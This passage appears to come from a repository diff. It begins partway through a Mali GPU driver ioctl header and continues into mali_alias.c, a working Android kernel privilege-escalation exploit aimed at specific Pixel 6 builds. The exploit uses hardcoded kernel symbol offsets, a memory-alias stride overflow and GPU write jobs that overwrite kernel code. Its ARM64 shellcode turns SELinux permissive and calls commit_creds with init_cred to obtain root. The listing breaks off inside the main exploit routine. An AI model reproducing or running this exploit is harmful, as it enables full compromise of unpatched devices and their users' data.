745	+	* the offset of that address
746	+	* into the region
747	+	* @in: Input parameters
748	+	* @in.gpu_addr: GPU virtual address
749	+	* @in.size: Size in bytes within the region
750	+	* @out: Output parameters
751	+	* @out.start: Address of the beginning of the memory region enclosing @gpu_addr
752	+	* for the length of @offset bytes
753	+	* @out.offset: The offset from the start of the memory region to @gpu_addr
754	+	*/
755	+	union kbase_ioctl_mem_find_gpu_start_and_offset {
756	+	struct {
757	+	__u64 gpu_addr;
758	+	__u64 size;
759	+	} in;
760	+	struct {
761	+	__u64 start;
762	+	__u64 offset;
763	+	} out;
764	+	};
765	+
766	+	#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
767	+	_IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
768	+
769	+	#define KBASE_IOCTL_CINSTR_GWT_START \
770	+	_IO(KBASE_IOCTL_TYPE, 33)
771	+
772	+	#define KBASE_IOCTL_CINSTR_GWT_STOP \
773	+	_IO(KBASE_IOCTL_TYPE, 34)
774	+
775	+	/**
776	+	* union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
777	+	* @in: Input parameters
778	+	* @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
779	+	* @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
780	+	* @in.len: Number of addresses the buffers can hold.
781	+	* @in.padding: padding
782	+	* @out: Output parameters
783	+	* @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
784	+	* @out.more_data_available: Status indicating if more addresses are available.
785	+	* @out.padding: padding
786	+	*
787	+	* This structure is used when performing a call to dump GPU write fault
788	+	* addresses.
789	+	*/
790	+	union kbase_ioctl_cinstr_gwt_dump {
791	+	struct {
792	+	__u64 addr_buffer;
793	+	__u64 size_buffer;
794	+	__u32 len;
795	+	__u32 padding;
796	+
797	+	} in;
798	+	struct {
799	+	__u32 no_of_addr_collected;
800	+	__u8 more_data_available;
801	+	__u8 padding[27];
802	+	} out;
803	+	};
804	+
805	+	#define KBASE_IOCTL_CINSTR_GWT_DUMP \
806	+	_IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
807	+
808	+	/**
809	+	* struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
810	+	*
811	+	* @va_pages: Number of VA pages to reserve for EXEC_VA
812	+	*/
813	+	struct kbase_ioctl_mem_exec_init {
814	+	__u64 va_pages;
815	+	};
816	+
817	+	#define KBASE_IOCTL_MEM_EXEC_INIT \
818	+	_IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
819	+
820	+	/**
821	+	* union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
822	+	* cpu/gpu time (counter values)
823	+	* @in: Input parameters
824	+	* @in.request_flags: Bit-flags indicating the requested types.
825	+	* @in.paddings: Unused, size alignment matching the out.
826	+	* @out: Output parameters
827	+	* @out.sec: Integer field of the monotonic time, unit in seconds.
828	+	* @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
829	+	* @out.padding: Unused, for __u64 alignment
830	+	* @out.timestamp: System wide timestamp (counter) value.
831	+	* @out.cycle_counter: GPU cycle counter value.
832	+	*/
833	+	union kbase_ioctl_get_cpu_gpu_timeinfo {
834	+	struct {
835	+	__u32 request_flags;
836	+	__u32 paddings[7];
837	+	} in;
838	+	struct {
839	+	__u64 sec;
840	+	__u32 nsec;
841	+	__u32 padding;
842	+	__u64 timestamp;
843	+	__u64 cycle_counter;
844	+	} out;
845	+	};
846	+
847	+	#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
848	+	_IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
849	+
850	+	/**
851	+	* struct kbase_ioctl_context_priority_check - Check the max possible priority
852	+	* @priority: Input priority & output priority
853	+	*/
854	+
855	+	struct kbase_ioctl_context_priority_check {
856	+	__u8 priority;
857	+	};
858	+
859	+	#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
860	+	_IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
861	+
862	+	/**
863	+	* struct kbase_ioctl_set_limited_core_count - Set the limited core count.
864	+	*
865	+	* @max_core_count: Maximum core count
866	+	*/
867	+	struct kbase_ioctl_set_limited_core_count {
868	+	__u8 max_core_count;
869	+	};
870	+
871	+	#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
872	+	_IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
873	+
874	+
875	+	/***************
876	+	* Pixel ioctls *
877	+	***************/
878	+
879	+	/**
880	+	* struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
881	+	*
882	+	* @dur_usec: Duration for GPU to stay awake.
883	+	*/
884	+	struct kbase_ioctl_apc_request {
885	+	__u32 dur_usec;
886	+	};
887	+
888	+	#define KBASE_IOCTL_APC_REQUEST \
889	+	_IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
890	+
891	+	/***************
892	+	* test ioctls *
893	+	***************/
894	+	#if MALI_UNIT_TEST
895	+	/* These ioctls are purely for test purposes and are not used in the production
896	+	* driver, they therefore may change without notice
897	+	*/
898	+
899	+	#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
900	+
901	+
902	+	/**
903	+	* struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
904	+	* @bytes_collected: number of bytes read by user
905	+	* @bytes_generated: number of bytes generated by tracepoints
906	+	*/
907	+	struct kbase_ioctl_tlstream_stats {
908	+	__u32 bytes_collected;
909	+	__u32 bytes_generated;
910	+	};
911	+
912	+	#define KBASE_IOCTL_TLSTREAM_STATS \
913	+	_IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
914	+
915	+	#endif /* MALI_UNIT_TEST */
916	+
917	+	/* Customer extension range */
918	+	#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
919	+
920	+	/* If the integration needs extra ioctl add them there
921	+	* like this:
922	+	*
923	+	* struct my_ioctl_args {
924	+	* ....
925	+	* }
926	+	*
927	+	* #define KBASE_IOCTL_MY_IOCTL \
928	+	* _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
929	+	*/
930	+
931	+
932	+	/**********************************
933	+	* Definitions for GPU properties *
934	+	**********************************/
935	+	#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
936	+	#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
937	+	#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
938	+	#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
939	+
940	+	#define KBASE_GPUPROP_PRODUCT_ID 1
941	+	#define KBASE_GPUPROP_VERSION_STATUS 2
942	+	#define KBASE_GPUPROP_MINOR_REVISION 3
943	+	#define KBASE_GPUPROP_MAJOR_REVISION 4
944	+	/* 5 previously used for GPU speed */
945	+	#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
946	+	/* 7 previously used for minimum GPU speed */
947	+	#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
948	+	#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
949	+	#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
950	+	#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
951	+	#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
952	+
953	+	#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
954	+	#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
955	+	#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
956	+
957	+	#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
958	+	#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
959	+
960	+	#define KBASE_GPUPROP_MAX_THREADS 18
961	+	#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
962	+	#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
963	+	#define KBASE_GPUPROP_MAX_REGISTERS 21
964	+	#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
965	+	#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
966	+	#define KBASE_GPUPROP_IMPL_TECH 24
967	+
968	+	#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
969	+	#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
970	+	#define KBASE_GPUPROP_RAW_L2_PRESENT 27
971	+	#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
972	+	#define KBASE_GPUPROP_RAW_L2_FEATURES 29
973	+	#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
974	+	#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
975	+	#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
976	+	#define KBASE_GPUPROP_RAW_AS_PRESENT 33
977	+	#define KBASE_GPUPROP_RAW_JS_PRESENT 34
978	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
979	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
980	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
981	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
982	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
983	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
984	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
985	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
986	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
987	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
988	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
989	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
990	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
991	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
992	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
993	+	#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
994	+	#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
995	+	#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
996	+	#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
997	+	#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
998	+	#define KBASE_GPUPROP_RAW_GPU_ID 55
999	+	#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
1000	+	#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
1001	+	#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
1002	+	#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
1003	+	#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
1004	+
1005	+	#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
1006	+	#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
1007	+	#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
1008	+	#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
1009	+	#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
1010	+	#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
1011	+	#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
1012	+	#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
1013	+	#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
1014	+	#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
1015	+	#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
1016	+	#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
1017	+	#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
1018	+	#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
1019	+	#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
1020	+	#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
1021	+	#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
1022	+	#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
1023	+	#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
1024	+
1025	+	#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
1026	+	#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
1027	+
1028	+	#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
1029	+
1030	+	#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
1031	+	#define KBASE_GPUPROP_TLS_ALLOC 84
1032	+	#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
1033	+
1034	+	#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
1035	+
1036	+	#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
1037	+
1038	+

■ ■ ■ ■ ■ ■

mali_alias.c

1	+	#include <err.h>
2	+	#include <errno.h>
3	+	#include <fcntl.h>
4	+	#include <stdio.h>
5	+	#include <stdlib.h>
6	+	#include <string.h>
7	+	#include <sys/mman.h>
8	+	#include <sys/stat.h>
9	+	#include <sys/types.h>
10	+	#include <unistd.h>
11	+	#include <sys/wait.h>
12	+	#include <sys/system_properties.h>
13	+
14	+	#include "stdbool.h"
15	+
16	+	#include "mali.h"
17	+	#include "mali_base_jm_kernel.h"
18	+	#include "midgard.h"
19	+
20	+	#define MALI "/dev/mali0"
21	+
22	+	#define PAGE_SHIFT 12
23	+
24	+	#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)
25	+
26	+	#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
27	+
28	+	#define POOL_SIZE 16384
29	+
30	+	#define RESERVED_SIZE 32
31	+
32	+	#define TOTAL_RESERVED_SIZE 1024
33	+
34	+	#define KERNEL_BASE 0x80000000
35	+
36	+	#define OVERWRITE_INDEX 256
37	+
38	+	#define ADRP_INIT_INDEX 0
39	+
40	+	#define ADD_INIT_INDEX 1
41	+
42	+	#define ADRP_COMMIT_INDEX 2
43	+
44	+	#define ADD_COMMIT_INDEX 3
45	+
46	+	#define AVC_DENY_2108 0x92df1c
47	+
48	+	#define SEL_READ_ENFORCE_2108 0x942ae4
49	+
50	+	#define INIT_CRED_2108 0x29a0570
51	+
52	+	#define COMMIT_CREDS_2108 0x180b0c
53	+
54	+	#define ADD_INIT_2108 0x9115c000
55	+
56	+	#define ADD_COMMIT_2108 0x912c3108
57	+
58	+	#define AVC_DENY_2201 0x930af4
59	+
60	+	#define SEL_READ_ENFORCE_2201 0x9456bc
61	+
62	+	#define INIT_CRED_2201 0x29b0570
63	+
64	+	#define COMMIT_CREDS_2201 0x183df0
65	+
66	+	#define ADD_INIT_2201 0x9115c000
67	+
68	+	#define ADD_COMMIT_2201 0x9137c108
69	+
70	+	#define AVC_DENY_2202 0x930b50
71	+
72	+	#define SEL_READ_ENFORCE_2202 0x94551c
73	+
74	+	#define INIT_CRED_2202 0x29b0570
75	+
76	+	#define COMMIT_CREDS_2202 0x183e3c
77	+
78	+	#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570
79	+
80	+	#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
81	+
82	+	static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108;
83	+
84	+	static uint64_t avc_deny = AVC_DENY_2108;
85	+
86	+	static int atom_number = 1;
87	+
88	+	/*
89	+	Overwriting SELinux to permissive
90	+	strb wzr, [x0]
91	+	mov x0, #0
92	+	ret
93	+	*/
94	+	static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
95	+
96	+	static uint32_t root_code[8] = {0};
97	+
98	+	struct base_mem_handle {
99	+	struct {
100	+	__u64 handle;
101	+	} basep;
102	+	};
103	+
104	+	struct base_mem_aliasing_info {
105	+	struct base_mem_handle handle;
106	+	__u64 offset;
107	+	__u64 length;
108	+	};
109	+
110	+	static int open_dev(char* name) {
111	+	int fd = open(name, O_RDWR);
112	+	if (fd == -1) {
113	+	err(1, "cannot open %s\n", name);
114	+	}
115	+	return fd;
116	+	}
117	+
118	+	void setup_mali(int fd) {
119	+	struct kbase_ioctl_version_check param = {0};
120	+	if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
121	+	err(1, "version check failed\n");
122	+	}
123	+	struct kbase_ioctl_set_flags set_flags = {1 << 3};
124	+	if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
125	+	err(1, "set flags failed\n");
126	+	}
127	+	}
128	+
129	+	void* setup_tracking_page(int fd) {
130	+	void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
131	+	if (region == MAP_FAILED) {
132	+	err(1, "setup tracking page failed");
133	+	}
134	+	return region;
135	+	}
136	+
137	+	void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
138	+	if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
139	+	err(1, "mem_alloc failed\n");
140	+	}
141	+	}
142	+
143	+	void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
144	+	if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
145	+	err(1, "mem_alias failed\n");
146	+	}
147	+	}
148	+
149	+	void mem_query(int fd, union kbase_ioctl_mem_query* query) {
150	+	if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
151	+	err(1, "mem_query failed\n");
152	+	}
153	+	}
154	+
155	+	uint32_t lo32(uint64_t x) {
156	+	return x & 0xffffffff;
157	+	}
158	+
159	+	uint32_t hi32(uint64_t x) {
160	+	return x >> 32;
161	+	}
162	+
163	+	uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
164	+	uint64_t pc_page = pc >> 12;
165	+	uint64_t label_page = label >> 12;
166	+	int64_t offset = (label_page - pc_page) << 12;
167	+	int64_t immhi_mask = 0xffffe0;
168	+	int64_t immhi = offset >> 14;
169	+	int32_t immlo = (offset >> 12) & 0x3;
170	+	uint32_t adpr = rd & 0x1f;
171	+	adpr \|= (1 << 28);
172	+	adpr \|= (1 << 31); //op
173	+	adpr \|= immlo << 29;
174	+	adpr \|= (immhi_mask & (immhi << 5));
175	+	return adpr;
176	+	}
177	+
178	+	void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
179	+
180	+	uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
181	+	//Sets x0 to init_cred
182	+	root_code[ADRP_INIT_INDEX] = init_adpr;
183	+	root_code[ADD_INIT_INDEX] = add_init;
184	+	//Sets x8 to commit_creds
185	+	root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
186	+	root_code[ADD_COMMIT_INDEX] = add_commit;
187	+	root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
188	+	root_code[5] = 0xd63f0100; // blr x8
189	+	root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
190	+	root_code[7] = 0xd65f03c0; // ret
191	+	}
192	+
193	+	uint64_t get_gpuprop(int fd, uint32_t key) {
194	+	struct kbase_ioctl_get_gpuprops props = {0};
195	+	uint8_t buffer[0x1000] = {0};
196	+	props.buffer = (uint64_t)(&(buffer[0]));
197	+	props.size = 0x1000;
198	+	if (ioctl(fd, KBASE_IOCTL_GET_GPUPROPS, &props) < 0) {
199	+	err(1, "get_gpuprop failed\n");
200	+	}
201	+	int idx = 0;
202	+	while (idx < 0x1000) {
203	+	uint32_t this_key = (uint32_t)(&(buffer[idx]));
204	+	uint32_t size_code = this_key & 0x3;
205	+	this_key = this_key >> 2;
206	+	uint64_t value;
207	+	idx += 4;
208	+	switch (size_code) {
209	+	case 0:
210	+	value = buffer[idx];
211	+	idx++;
212	+	break;
213	+	case 1:
214	+	value = (uint16_t)(&(buffer[idx]));
215	+	idx += 2;
216	+	break;
217	+	case 2:
218	+	value = (uint32_t)(&(buffer[idx]));
219	+	idx += 4;
220	+	break;
221	+	case 3:
222	+	value = (uint64_t)(&(buffer[idx]));
223	+	idx += 8;
224	+	break;
225	+	}
226	+	if (key == this_key) return value;
227	+	}
228	+	err(1, "cannot find prop\n");
229	+	return -1;
230	+	}
231	+
232	+	void* map_gpu(int mali_fd, unsigned int pages, bool read_only, int group) {
233	+	union kbase_ioctl_mem_alloc alloc = {0};
234	+	alloc.in.flags = BASE_MEM_PROT_CPU_RD \| BASE_MEM_PROT_GPU_RD \| BASE_MEM_PROT_CPU_WR \| (group << 22);
235	+	int prot = PROT_READ \| PROT_WRITE;
236	+	if (!read_only) {
237	+	alloc.in.flags \|= BASE_MEM_PROT_GPU_WR;
238	+	prot \|= PROT_WRITE;
239	+	}
240	+	alloc.in.va_pages = pages;
241	+	alloc.in.commit_pages = pages;
242	+	mem_alloc(mali_fd, &alloc);
243	+	void* region = mmap(NULL, 0x1000 * pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
244	+	if (region == MAP_FAILED) {
245	+	err(1, "mmap failed");
246	+	}
247	+	return region;
248	+	}
249	+
250	+	void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
251	+	void* jc_region = map_gpu(mali_fd, 1, false, 0);
252	+	struct MALI_JOB_HEADER jh = {0};
253	+	jh.is_64b = true;
254	+	jh.type = MALI_JOB_TYPE_WRITE_VALUE;
255	+
256	+	struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
257	+	payload.type = type;
258	+	payload.immediate_value = value;
259	+	payload.address = gpu_addr;
260	+
261	+	MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
262	+	MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
263	+	uint32_t* section = (uint32_t*)jc_region;
264	+	struct base_jd_atom_v2 atom = {0};
265	+	atom.jc = (uint64_t)jc_region;
266	+	atom.atom_number = atom_number;
267	+	atom.core_req = BASE_JD_REQ_CS;
268	+	struct kbase_ioctl_job_submit submit = {0};
269	+	submit.addr = (uint64_t)(&atom);
270	+	submit.nr_atoms = 1;
271	+	submit.stride = sizeof(struct base_jd_atom_v2);
272	+	if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
273	+	err(1, "submit job failed\n");
274	+	}
275	+	usleep(10000);
276	+	}
277	+
278	+	void* drain_mem_pool(int mali_fd) {
279	+	return map_gpu(mali_fd, POOL_SIZE, false, 1);
280	+	}
281	+
282	+	void release_mem_pool(void* drain) {
283	+	munmap(drain, POOL_SIZE * 0x1000);
284	+	}
285	+
286	+	void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
287	+	for (int i = 0; i < nents; i++) {
288	+	union kbase_ioctl_mem_alloc alloc = {0};
289	+	alloc.in.flags = BASE_MEM_PROT_CPU_RD \| BASE_MEM_PROT_GPU_RD \| BASE_MEM_PROT_CPU_WR \| BASE_MEM_PROT_GPU_WR \| (1 << 22);
290	+	int prot = PROT_READ \| PROT_WRITE;
291	+	alloc.in.va_pages = pages;
292	+	alloc.in.commit_pages = pages;
293	+	mem_alloc(mali_fd, &alloc);
294	+	reserved_va[i] = alloc.out.gpu_va;
295	+	}
296	+	}
297	+
298	+	void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
299	+	for (int i = 0; i < nents; i++) {
300	+	void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ \| PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
301	+	if (reserved == MAP_FAILED) {
302	+	err(1, "mmap reserved failed");
303	+	}
304	+	reserved_va[i] = (uint64_t)reserved;
305	+	}
306	+	}
307	+
308	+	uint64_t set_addr_lv3(uint64_t addr) {
309	+	uint64_t pfn = addr >> PAGE_SHIFT;
310	+	pfn &= ~ 0x1FFUL;
311	+	pfn \|= 0x100UL;
312	+	return pfn << PAGE_SHIFT;
313	+	}
314	+
315	+	static inline uint64_t compute_pt_index(uint64_t addr, int level) {
316	+	uint64_t vpfn = addr >> PAGE_SHIFT;
317	+	vpfn >>= (3 - level) * 9;
318	+	return vpfn & 0x1FF;
319	+	}
320	+
321	+	void write_state(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
322	+	uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
323	+	uint64_t curr_overwrite_addr = 0;
324	+	for (int i = 0; i < size; i++) {
325	+	uint64_t base = reserved[i];
326	+	uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
327	+	uint64_t start_idx = compute_pt_index(base, 3);
328	+	uint64_t end_idx = compute_pt_index(end, 3);
329	+	for (uint64_t addr = base; addr < end; addr += 0x1000) {
330	+	uint64_t overwrite_addr = set_addr_lv3(addr);
331	+	if (curr_overwrite_addr != overwrite_addr) {
332	+	printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
333	+	curr_overwrite_addr = overwrite_addr;
334	+	write_to(mali_fd, overwrite_addr + func_offset, 0, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_8);
335	+	usleep(300000);
336	+	}
337	+	}
338	+	}
339	+	}
340	+
341	+
342	+	void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
343	+	uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
344	+	uint64_t curr_overwrite_addr = 0;
345	+	for (int i = 0; i < size; i++) {
346	+	uint64_t base = reserved[i];
347	+	uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
348	+	uint64_t start_idx = compute_pt_index(base, 3);
349	+	uint64_t end_idx = compute_pt_index(end, 3);
350	+	for (uint64_t addr = base; addr < end; addr += 0x1000) {
351	+	uint64_t overwrite_addr = set_addr_lv3(addr);
352	+	if (curr_overwrite_addr != overwrite_addr) {
353	+	printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
354	+	curr_overwrite_addr = overwrite_addr;
355	+	for (int code = code_size - 1; code >= 0; code--) {
356	+	write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
357	+	}
358	+	usleep(300000);
359	+	}
360	+	}
361	+	}
362	+	}
363	+
364	+	int run_enforce() {
365	+	char result = '2';
366	+	sleep(3);
367	+	int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
368	+	read(enforce_fd, &result, 1);
369	+	close(enforce_fd);
370	+	printf("result %d\n", result);
371	+	return result;
372	+	}
373	+
374	+	void select_offset() {
375	+	char fingerprint[256];
376	+	int len = __system_property_get("ro.build.fingerprint", fingerprint);
377	+	printf("fingerprint: %s\n", fingerprint);
378	+	if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
379	+	avc_deny = AVC_DENY_2108;
380	+	sel_read_enforce = SEL_READ_ENFORCE_2108;
381	+	fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
382	+	return;
383	+	}
384	+	if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
385	+	avc_deny = AVC_DENY_2201;
386	+	sel_read_enforce = SEL_READ_ENFORCE_2201;
387	+	fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
388	+	return;
389	+	}
390	+	if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
391	+	avc_deny = AVC_DENY_2202;
392	+	sel_read_enforce = SEL_READ_ENFORCE_2202;
393	+	fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
394	+	return;
395	+	}
396	+	err(1, "unable to match build id\n");
397	+	}
398	+
399	+	//Clean up pagetable
400	+	void cleanup(int mali_fd, uint64_t gpu_va, uint64_t* reserved, size_t reserved_size) {
401	+	for (int i = 0; i < 2; i++) {
402	+	write_to(mali_fd, gpu_va + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
403	+	}
404	+	}
405	+
406	+	int run_exploit() {
407	+	int mali_fd = open_dev(MALI);
408	+	uint64_t gpu_va[3] = {0};
409	+	uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
410	+
411	+	setup_mali(mali_fd);
412	+
413	+	void* tracking_page = setup_tracking_page(mali_fd);
414	+	printf("tracking page %p\n", tracking_page);
415	+
416	+	//Allocate enough pages so the page free'd later will spill into the device pool
417	+	void* drain = drain_mem_pool(mali_fd);
418	+	printf("drain %p\n", drain);
419	+
420	+	//Regions for triggering the bug
421	+	for (int i = 0; i < 2; i++) {
422	+	void* region = map_gpu(mali_fd, 3, false, 1);
423	+	gpu_va[i] = (uint64_t)region;
424	+	}
425	+
426	+	union kbase_ioctl_mem_alias alias = {0};
427	+	alias.in.flags = BASE_MEM_PROT_CPU_RD \| BASE_MEM_PROT_GPU_RD \| BASE_MEM_PROT_CPU_WR \| BASE_MEM_PROT_GPU_WR;
428	+	alias.in.stride = 9223372036854775808ull + 1;
429	+
430	+	alias.in.nents = 2;
431	+	struct base_mem_aliasing_info ai[2];
432	+	ai[0].handle.basep.handle = gpu_va[0];
433	+	ai[1].handle.basep.handle = gpu_va[0];
